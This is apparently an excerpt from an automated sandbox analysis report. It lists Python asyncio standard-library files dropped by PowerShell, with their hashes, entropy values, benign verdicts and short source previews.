                                                                                                                                                                                                            Preview:__all__ = ()....import reprlib..from _thread import get_ident....from . import format_helpers....# States for Future..._PENDING = 'PENDING'.._CANCELLED = 'CANCELLED'.._FINISHED = 'FINISHED'......def isfuture(obj):.. """Check for a Future..... This returns True when obj is a Future instance or is advertising.. itself as duck-type compatible by setting _asyncio_future_blocking... See comment in Future for more details... """.. return (hasattr(obj.__class__, '_asyncio_future_blocking') and.. obj._asyncio_future_blocking is not None)......def _format_callbacks(cb):.. """helper function for Future.__repr__""".. size = len(cb).. if not size:.. cb = ''.... def format_cb(callback):.. return format_helpers._format_callback_source(callback, ()).... if size == 1:.. cb = format_cb(cb[0][0]).. elif size == 2:.. cb = '{}, {}'.format(format_cb(cb[0][0]), format_cb(cb[1][0])).. elif size > 2:.. cb = '{}, <{} more>, {}
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9128
                                                                                                                                                                                                            Entropy (8bit):4.251860245095017
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:lszIZ8MLHzG3Brs9pIKrlNtdpnqxfPx1BKV2acfn/CfNrPQh/Km:zZxK3pYplNtdNO7Msn/YPQh/5
                                                                                                                                                                                                            MD5:19CC5FEA2559B817BF9FCAA3EE4B76B4
                                                                                                                                                                                                            SHA1:7129D92BA411059492397735E82A2379E813FE46
                                                                                                                                                                                                            SHA-256:FCD594ABA1912464A80B4C3E4651D5677787395541828A887EA1E0B3A16861FE
                                                                                                                                                                                                            SHA-512:810F8D8D7B37733F03B19B17F641FBD91CC712C72FEAF657A2521111586DD8130622F3EEABD71EF47CC88D66987AA8E2CA672A2B1393CB0D4901A581D6E9A671
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:import collections..import subprocess..import warnings....from . import protocols..from . import transports..from .log import logger......class BaseSubprocessTransport(transports.SubprocessTransport):.... def __init__(self, loop, protocol, args, shell,.. stdin, stdout, stderr, bufsize,.. waiter=None, extra=None, **kwargs):.. super().__init__(extra).. self._closed = False.. self._protocol = protocol.. self._loop = loop.. self._proc = None.. self._pid = None.. self._returncode = None.. self._exit_waiters = [].. self._pending_calls = collections.deque().. self._pipes = {}.. self._finished = False.... if stdin == subprocess.PIPE:.. self._pipes[0] = None.. if stdout == subprocess.PIPE:.. self._pipes[1] = None.. if stderr == subprocess.PIPE:.. self._pipes[2] = None.... # Create the child process: set the _proc attribute..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2552
                                                                                                                                                                                                            Entropy (8bit):4.339168002871409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:gDlbU1rzhhMheP0PxxbycJw2O+wJouDpi4w8L2WvK7:gDl4BzTMgPw9ycJw2luD3w8L2yw
                                                                                                                                                                                                            MD5:47F432C42B8F851DE2915418672E8F7A
                                                                                                                                                                                                            SHA1:B741A4C038CD7E13D97A09810875A67FB3E71234
                                                                                                                                                                                                            SHA-256:A6B2FA6708C62DE555FE694CE3D0B7A2427A8A1A50CDA3694A09754F34101B14
                                                                                                                                                                                                            SHA-512:1FF0D211EACC621D5D8D89D3637069B935F03E69313EE83BE549D3941CEFCF3D71E2A3541E6E5A70CA0859CF3A7B4E10F787027C3B039512D2CCBF6D2779F6C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:import linecache..import traceback....from . import base_futures..from . import coroutines......def _task_repr_info(task):.. info = base_futures._future_repr_info(task).... if task._must_cancel:.. # replace status.. info[0] = 'cancelling'.... info.insert(1, 'name=%r' % task.get_name()).... coro = coroutines._format_coroutine(task._coro).. info.insert(2, f'coro=<{coro}>').... if task._fut_waiter is not None:.. info.insert(3, f'wait_for={task._fut_waiter!r}').. return info......def _task_get_stack(task, limit):.. frames = [].. if hasattr(task._coro, 'cr_frame'):.. # case 1: 'async def' coroutines.. f = task._coro.cr_frame.. elif hasattr(task._coro, 'gi_frame'):.. # case 2: legacy coroutines.. f = task._coro.gi_frame.. elif hasattr(task._coro, 'ag_frame'):.. # case 3: async generators.. f = task._coro.ag_frame.. else:.. # case 4: unknown objects.. f = None.. if f is not None
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):915
                                                                                                                                                                                                            Entropy (8bit):5.194623543571242
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:yD1CxjkkazhtNRHQVTXUqb1j++zV730JGvHApb/f:yJXhtDy7RCwT0JGvHKf
                                                                                                                                                                                                            MD5:6B81F558F9EE2044D0C6AAE13C5C8E84
                                                                                                                                                                                                            SHA1:E534CE8DD2B6AF74CD7E515B99B5C5C76DCA90E6
                                                                                                                                                                                                            SHA-256:395225E259A6C6486DC64213EC579E7A7C2E4E4BE83935B6C4120DCD6A1F929A
                                                                                                                                                                                                            SHA-512:936C5E9ECD3E933D59016C46A1C876EB7F2AAE0CC138C5B3C7815411138E2957838FE68A7648E406F7AF1004887CFF7E1F5976800770F1C6CF2EFACD28C170A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:import enum....# After the connection is lost, log warnings after this many write()s...LOG_THRESHOLD_FOR_CONNLOST_WRITES = 5....# Seconds to wait before retrying accept()...ACCEPT_RETRY_DELAY = 1....# Number of stack entries to capture in debug mode...# The larger the number, the slower the operation in debug mode..# (see extract_stack() in format_helpers.py)...DEBUG_STACK_DEPTH = 10....# Number of seconds to wait for SSL handshake to complete..# The default timeout matches that of Nginx...SSL_HANDSHAKE_TIMEOUT = 60.0....# Used in sendfile fallback code. We use fallback for platforms..# that don't support sendfile, or for TLS connections...SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 256....# The enum should be here to break circular dependencies between..# base_events and sslproto..class _SendfileMode(enum.Enum):.. UNSUPPORTED = enum.auto().. TRY_NATIVE = enum.auto().. FALLBACK = enum.auto()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9066
                                                                                                                                                                                                            Entropy (8bit):4.487488453421929
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:b0cmhmIeoXUxyE1Fa7ckgkZevHOlyu/FJYpZEMhU:b0crIV2Fa7DmEM+
                                                                                                                                                                                                            MD5:D2A6BE6AFF7175D295DA4A3A25A7E069
                                                                                                                                                                                                            SHA1:A28744BD6BC60EC21520BCD7FCACFD79CB6BA7EF
                                                                                                                                                                                                            SHA-256:C4F7628AA80D102E1F1478333F99767E1432312A49C54E08F4FB682140E6A590
                                                                                                                                                                                                            SHA-512:40B236D0151D220FCDBBC963BC9C506C8B04D0B204E3E94F960D15870C12BB0B69258164861DBF2BAF56A2C17D25320BB3C66DBEEDFBBF0B746E10690C2D8921
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:__all__ = 'coroutine', 'iscoroutinefunction', 'iscoroutine'....import collections.abc..import functools..import inspect..import os..import sys..import traceback..import types..import warnings....from . import base_futures..from . import constants..from . import format_helpers..from .log import logger......def _is_debug_mode():.. # If you set _DEBUG to true, @coroutine will wrap the resulting.. # generator objects in a CoroWrapper instance (defined below). That.. # instance will log a message when the generator is never iterated.. # over, which may happen when you forget to use "await" or "yield from".. # with a coroutine call... # Note that the value of the _DEBUG flag is taken.. # when the decorator is used, so to be of any use it must be set.. # before you define your coroutines. A downside of using this feature.. # is that tracebacks show entries for the CoroWrapper.__next__ method.. # when _DEBUG is true... return sys.flags.dev_mode or (not sys.fl
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28165
                                                                                                                                                                                                            Entropy (8bit):4.505626464587071
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:/6h8+WmJcv+fTXAw8k4Zhz5H++yWxCWAeCv:/6ZcvwM/Z++yXWAeCv
                                                                                                                                                                                                            MD5:652263825F7EED38C021E3953AA148D6
                                                                                                                                                                                                            SHA1:1AEC075E60081C28342B74EA30D08B499D340B4D
                                                                                                                                                                                                            SHA-256:3023BB8FFBF1827E65E2B7B9031F9F0927D16481A06A3C7328F5E5080C5AC6F6
                                                                                                                                                                                                            SHA-512:95808FF0F687D14C58DA8C53988DFF3B79DF39097CB9F5428B930949DB7C22897E742E645A47D354F7AF85423F79569CB8536DE1AD10F5B26C69DD416857945F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Event loop and event loop policy."""....__all__ = (.. 'AbstractEventLoopPolicy',.. 'AbstractEventLoop', 'AbstractServer',.. 'Handle', 'TimerHandle',.. 'get_event_loop_policy', 'set_event_loop_policy',.. 'get_event_loop', 'set_event_loop', 'new_event_loop',.. 'get_child_watcher', 'set_child_watcher',.. '_set_running_loop', 'get_running_loop',.. '_get_running_loop',..)....import contextvars..import os..import socket..import subprocess..import sys..import threading....from . import format_helpers......class Handle:.. """Object returned by callback registration methods.""".... __slots__ = ('_callback', '_args', '_cancelled', '_loop',.. '_source_traceback', '_repr', '__weakref__',.. '_context').... def __init__(self, callback, args, loop, context=None):.. if context is None:.. context = contextvars.copy_context().. self._context = context.. self._loop = loop.. self._callback = callback
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1691
                                                                                                                                                                                                            Entropy (8bit):4.660255921365317
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:AwQZbzXqxLg93Z1zULxID+XvsaAWl2iyjDzPfgEBF6R9TaAs3hG:+JrYLiXzULxy+/sa/l2nzP4EMaBhG
                                                                                                                                                                                                            MD5:A83317D64AC8D1EB4FDACE5809F31435
                                                                                                                                                                                                            SHA1:2D44A9495BF33B3086EAB28C4D16BB32AD189FB8
                                                                                                                                                                                                            SHA-256:CCD5456CD6DD88563F208534D3049632A7CAA4EB9266682F6B46E988C05C2CC0
                                                                                                                                                                                                            SHA-512:6B729B60BD8910FE112B4F2927C796D86F81A65355D37CA4CCCA5476F1CA73ABF2A61136E763F04EDBC5CB16756A2C7075307CC1E28665CE28B0752572ECFCFE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""asyncio exceptions."""......__all__ = ('CancelledError', 'InvalidStateError', 'TimeoutError',.. 'IncompleteReadError', 'LimitOverrunError',.. 'SendfileNotAvailableError')......class CancelledError(BaseException):.. """The Future or Task was cancelled."""......class TimeoutError(Exception):.. """The operation exceeded the given deadline."""......class InvalidStateError(Exception):.. """The operation is not allowed in this state."""......class SendfileNotAvailableError(RuntimeError):.. """Sendfile syscall is not available..... Raised if OS does not support sendfile syscall for given socket or.. file type... """......class IncompleteReadError(EOFError):.. """.. Incomplete read error. Attributes:.... - partial: read bytes string before the end of stream was reached.. - expected: total number of expected bytes (or None if unknown).. """.. def __init__(self, partial, expected):.. r_expected = 'undefined' if expected is None
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2480
                                                                                                                                                                                                            Entropy (8bit):4.6056367555974065
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:g863N4N9017WBmO9uMxP6U8QtUUIKOxYJCd67PiJQUhAs42eDv4mQ0L0j:g863NC9IiBmKxiUlWVKPJCs7oQUhANLi
                                                                                                                                                                                                            MD5:64D0BFEF9B45C0EA83D954360F021869
                                                                                                                                                                                                            SHA1:1BD55E0614613C37EADBD77188962F3BD5F28E30
                                                                                                                                                                                                            SHA-256:657449627E8706CDC28A575DF9E975058E787FA2CC6A70B5DA7F9EB39D371DCB
                                                                                                                                                                                                            SHA-512:23583958AAFD449B0B9991A0CFE569092D22684464F4DB3400C8E56B22CE127C0E73E94D59C976ECC40A70F2FE850164DF7AAB1A147629AF45BC7145B1C6BE9D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:import functools..import inspect..import reprlib..import sys..import traceback....from . import constants......def _get_function_source(func):.. func = inspect.unwrap(func).. if inspect.isfunction(func):.. code = func.__code__.. return (code.co_filename, code.co_firstlineno).. if isinstance(func, functools.partial):.. return _get_function_source(func.func).. if isinstance(func, functools.partialmethod):.. return _get_function_source(func.func).. return None......def _format_callback_source(func, args):.. func_repr = _format_callback(func, args, None).. source = _get_function_source(func).. if source:.. func_repr += f' at {source[0]}:{source[1]}'.. return func_repr......def _format_args_and_kwargs(args, kwargs):.. """Format function arguments and keyword arguments..... Special case for a single parameter: ('hello',) is formatted as ('hello')... """.. # use reprlib to limit the length of the output.. items = [].
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14613
                                                                                                                                                                                                            Entropy (8bit):4.480711889612748
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RH8T77Dp/kxdJtv7umUctWcOXOK4Uf6YRFTR/iNxzLdefQ9c0S+:FwN/UdJthZtWcy4k5E/g2Df
                                                                                                                                                                                                            MD5:0B32D855310997530CC42567E8B9F25D
                                                                                                                                                                                                            SHA1:B4B265A3483EF42773B58698D7157EB32154BC28
                                                                                                                                                                                                            SHA-256:F8C46AB00E6F5C6C0BD968691832DFBD653890F0BE2AAE06E9DEB08EB447AC61
                                                                                                                                                                                                            SHA-512:57C33A26505D5D9F83B5967E99920EE9BC11889FD7FC4DC95B67211F8B040A50396C17EC5B8D005F4FFAF55ACE50864EB6528FD7CE9F4BAD4273A7EE8FF62B11
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""A Future class similar to the one in PEP 3148."""....__all__ = (.. 'Future', 'wrap_future', 'isfuture',..)....import concurrent.futures..import contextvars..import logging..import sys..from types import GenericAlias....from . import base_futures..from . import events..from . import exceptions..from . import format_helpers......isfuture = base_futures.isfuture......_PENDING = base_futures._PENDING.._CANCELLED = base_futures._CANCELLED.._FINISHED = base_futures._FINISHED......STACK_DEBUG = logging.DEBUG - 1 # heavy-duty debugging......class Future:.. """This class is *almost* compatible with concurrent.futures.Future..... Differences:.... - This class is not thread-safe..... - result() and exception() do not take a timeout argument and.. raise an exception when the future isn't done yet..... - Callbacks registered with add_done_callback() are always called.. via the event loop's call_soon()..... - This class is not compatible with the wait() and as_comp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14560
                                                                                                                                                                                                            Entropy (8bit):4.361732000873094
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:j8+Ytua1IhtzLJInU/iI7xyV+Wea/k7mt4YeJV8UxbLosoqL/Nl/1BbW5ZaZHZxL:j8OOiBVVoui5k2sC/my+EJvlU
                                                                                                                                                                                                            MD5:1BA042DC0B00555B09A40584EC29F5F0
                                                                                                                                                                                                            SHA1:2E782AC9F610E1856463D1B3AE9D71EA267F1CEA
                                                                                                                                                                                                            SHA-256:64DD6535527FD499358D0B56C9FA8D6206E2B9421BA00EEE414F4FE79EEF75A4
                                                                                                                                                                                                            SHA-512:B373178E27FE06D201E58B387D507D55E1EECCB827D017D2BC314E1068C65FB8CC89E09BDD8950632DA98DA09CEFBF4384B686472863A8531C8E093F3D126C5A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Synchronization primitives."""....__all__ = ('Lock', 'Event', 'Condition', 'Semaphore', 'BoundedSemaphore')....import collections....from . import exceptions..from . import mixins..from . import tasks......class _ContextManagerMixin:.. async def __aenter__(self):.. await self.acquire().. # We have no use for the "as ..." clause in the with.. # statement for locks... return None.... async def __aexit__(self, exc_type, exc, tb):.. self.release()......class Lock(_ContextManagerMixin, mixins._LoopBoundMixin):.. """Primitive lock objects..... A primitive lock is a synchronization primitive that is not owned.. by a particular coroutine when locked. A primitive lock is in one.. of two states, 'locked' or 'unlocked'..... It is created in the unlocked state. It has two basic methods,.. acquire() and release(). When the state is unlocked, acquire().. changes the state to locked and returns immediately. When the.. state is l
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):131
                                                                                                                                                                                                            Entropy (8bit):4.37276371888401
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:W5DQIMeHnoHIgXAgCrovYSNAFWAX+k++SoRKt1zC2QK466AGB:8QIbnoHXe+bPAukNSoRKtQW6Au
                                                                                                                                                                                                            MD5:07687A8E3B30B3B320A3B3164812E3B1
                                                                                                                                                                                                            SHA1:04A117C1275B17E12EC9527F49CA74399F9FFB28
                                                                                                                                                                                                            SHA-256:72433D0D5A4205B74EF4FF95CD3E1C8D98960A58371E5546698A3A38F231058C
                                                                                                                                                                                                            SHA-512:E2C8DE755A6281245B0A25BA20F4956EBDBB83AD375DEC62A93310C7D5F1BF12B10A7467807272B7323EB5D0C9CF3771421100B588A78945EEB972D768ED52FA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Logging configuration."""....import logging......# Name the logger after the package...logger = logging.getLogger(__package__)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):834
                                                                                                                                                                                                            Entropy (8bit):4.321361139849749
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:20t1eh0wpu9qvkc1AwJPjVb2jMxAmd9qIWc2h9KRfuPLDclRYR:20t1fw0EHAgVbymd0c8KADclRY
                                                                                                                                                                                                            MD5:9C28F0870DDAAA3C763A1A9E062BAF75
                                                                                                                                                                                                            SHA1:A348DC5228CD857EE6BD64F8CCF99210ECA48521
                                                                                                                                                                                                            SHA-256:D43484AB1B446B66A53FDED1BE81E78934D391BB0A109B932E31579CBC55749D
                                                                                                                                                                                                            SHA-512:FB1B92F14CC2801082EE39D4D9DE4F2E82BB99F6387F47963B52027C26A161CCBFA8EF4668A621274251E4A8827DF1E18E0410ADED575DC6323ABB72938F75F6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Event loop mixins."""....import threading..from . import events...._global_lock = threading.Lock()....# Used as a sentinel for loop parameter.._marker = object()......class _LoopBoundMixin:.. _loop = None.... def __init__(self, *, loop=_marker):.. if loop is not _marker:.. raise TypeError(.. f'As of 3.10, the *loop* parameter was removed from '.. f'{type(self).__name__}() since it is no longer necessary'.. ).... def _get_loop(self):.. loop = events._get_running_loop().... if self._loop is None:.. with _global_lock:.. if self._loop is None:.. self._loop = loop.. if loop is not self._loop:.. raise RuntimeError(f'{self!r} is bound to a different event loop').. return loop..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33416
                                                                                                                                                                                                            Entropy (8bit):4.231855278501714
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:H4dU5QRJLcasHTpbMaNZfo2k/qnmaT7HBBtKbR:Yi5kqppzfoxaTNaR
                                                                                                                                                                                                            MD5:C74A3CE8ECF41AE54FB6806F4987EC18
                                                                                                                                                                                                            SHA1:D067B48487E0C0A1875AFF89C487A1ABBBFBFEA7
                                                                                                                                                                                                            SHA-256:3FFF29751AEF9A571AD124BCE1EB5515670A496038580A155D56319F88049B71
                                                                                                                                                                                                            SHA-512:86FCCFB626B36CE360C8945F2ED3FB56DECC8A07C3D7D72F26686EB28266248AAD4C242CDD616775EF0469AEA9555B72ADEB5792ECCD355505DF87312BABB1AE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Event loop using a proactor and related classes.....A proactor is a "notify-on-completion" multiplexer. Currently a..proactor is only implemented on Windows with IOCP..."""....__all__ = 'BaseProactorEventLoop',....import io..import os..import socket..import warnings..import signal..import threading..import collections....from . import base_events..from . import constants..from . import futures..from . import exceptions..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger......def _set_socket_extra(transport, sock):.. transport._extra['socket'] = trsock.TransportSocket(sock).... try:.. transport._extra['sockname'] = sock.getsockname().. except socket.error:.. if transport._loop.get_debug():.. logger.warning(.. "getsockname() failed on %r", sock, exc_info=True).... if 'peername' not in transport._extra:.. try:.. transport._extra['peername'] = sock
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7173
                                                                                                                                                                                                            Entropy (8bit):4.508690129802189
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:GvIrPBEBCe7pXv83jwbtB2S1KnUB/MB2E505cFj:GvsqNVETwmSwU5hE5Z
                                                                                                                                                                                                            MD5:AA57F822D953D524C717845CF040C7A8
                                                                                                                                                                                                            SHA1:4A044088F18490FD5E29F132BA5EC1224C723BB9
                                                                                                                                                                                                            SHA-256:66038B46A3D99B358166A061B9D5E9486CDDB9626D84C34F343640BB0D0EEC0A
                                                                                                                                                                                                            SHA-512:A3FB50B69AA2523C17AE04B7562B42EBE2FB5F9EA5B23403EE9D92059C7B23727F30867FA561EC7E165D21B77C6F84F0024972D7335ADB09245198935985234B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Abstract Protocol base classes."""....__all__ = (.. 'BaseProtocol', 'Protocol', 'DatagramProtocol',.. 'SubprocessProtocol', 'BufferedProtocol',..)......class BaseProtocol:.. """Common base class for protocol interfaces..... Usually user implements protocols that derived from BaseProtocol.. like Protocol or ProcessProtocol..... The only case when BaseProtocol should be implemented directly is.. write-only transport like write pipe.. """.... __slots__ = ().... def connection_made(self, transport):.. """Called when a connection is made..... The argument is the transport representing the pipe connection... To receive data, wait for data_received() calls... When the connection is closed, connection_lost() is called... """.... def connection_lost(self, exc):.. """Called when the connection is lost or closed..... The argument is an exception object or None (the latter.. meaning a regular EOF is receive
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8279
                                                                                                                                                                                                            Entropy (8bit):4.361132338433949
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ZihNcb/YAsKXSWewpst8gcyTD6NKN2q2p9As/g2pbq8UXZbFLLBk3:ucbQfKX/vpXOXe+AL2ZJs
                                                                                                                                                                                                            MD5:CDB372DFBA39832860E44593EFD7BB4B
                                                                                                                                                                                                            SHA1:A155B92CC3855D8423B8C018B6BC5C04454BF878
                                                                                                                                                                                                            SHA-256:C620C13D1ADBEE12D3F41278D44AAA7C88EB003345054E283E5717604742BFAB
                                                                                                                                                                                                            SHA-512:D1BF3E79DA474656D6CA8D08010786CBA30118DA03024AE86146FE533ECEA2C0975BBFEEA976648F4E0BE4C9742CD390898ADE2FDF869994F93D58543CEB0E45
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:__all__ = ('Queue', 'PriorityQueue', 'LifoQueue', 'QueueFull', 'QueueEmpty')....import collections..import heapq..from types import GenericAlias....from . import locks..from . import mixins......class QueueEmpty(Exception):.. """Raised when Queue.get_nowait() is called on an empty Queue.""".. pass......class QueueFull(Exception):.. """Raised when the Queue.put_nowait() method is called on a full Queue.""".. pass......class Queue(mixins._LoopBoundMixin):.. """A queue, useful for coordinating producer and consumer coroutines..... If maxsize is less than or equal to zero, the queue size is infinite. If it.. is an integer greater than 0, then "await put()" will block when the.. queue reaches maxsize, until an item is removed by get()..... Unlike the standard library Queue, you can reliably know this Queue's size.. with qsize(), since your single-threaded asyncio application won't be.. interrupted between calling qsize() and doing an operation on the Queue..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2177
                                                                                                                                                                                                            Entropy (8bit):4.3845986671765855
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Eu4KyUEuGvw2Fiu3L0lruA1U29iQ80YnyFnhdYN:Eu4KyUUw2F3crcQ4IhdYN
                                                                                                                                                                                                            MD5:9E248DFB8081884438219581CE36B284
                                                                                                                                                                                                            SHA1:0BDC352B5FE9D98A22152BF3336E08BE69FF904A
                                                                                                                                                                                                            SHA-256:8DF94155A34A2D7000DFAB35612120D7CBEC630284F914AD1FE86EC7129C5CFB
                                                                                                                                                                                                            SHA-512:8CD0CED260AABFFB226ABA6E0F6E4D8026B42EC666EC82370568E47E26B66805D97CA1DD08E5F800058BE18967062F080E2FDFFC7891D39B4259A8F120ACF459
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:__all__ = 'run',....from . import coroutines..from . import events..from . import tasks......def run(main, *, debug=None):.. """Execute the coroutine and return the result..... This function runs the passed coroutine, taking care of.. managing the asyncio event loop and finalizing asynchronous.. generators..... This function cannot be called when another asyncio event loop is.. running in the same thread..... If debug is True, the event loop will be run in debug mode..... This function always creates a new event loop and closes it at the end... It should be used as a main entry point for asyncio programs, and should.. ideally only be called once..... Example:.... async def main():.. await asyncio.sleep(1).. print('hello').... asyncio.run(main()).. """.. if events._get_running_loop() is not None:.. raise RuntimeError(.. "asyncio.run() cannot be called from a running event loop").... if not co
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):40805
                                                                                                                                                                                                            Entropy (8bit):4.268505628271826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:Qwr1dLz35d/SYSq/dmNO1LTEY8A3sz560O82:QWxT58NFA
                                                                                                                                                                                                            MD5:AA14EE7C822C7279DE4D1A6196C4431B
                                                                                                                                                                                                            SHA1:AEDCFE6D4578297830E9E949D3B9C29BF19C055D
                                                                                                                                                                                                            SHA-256:BB16C34D07EC9CA3804389E2880747DB65B898B6E1C84B69B583C7F98F5875BD
                                                                                                                                                                                                            SHA-512:6EA5BBF87BCCB0BB8E253523505EA44F8E8CCDE05EC2FC4DE09A1720300282D34BD84FFF76C7ADC50B702CE3C62E422709E86B7F16B833DA112820E9793C94C8
                                                                                                                                                                                                            Malicious:false
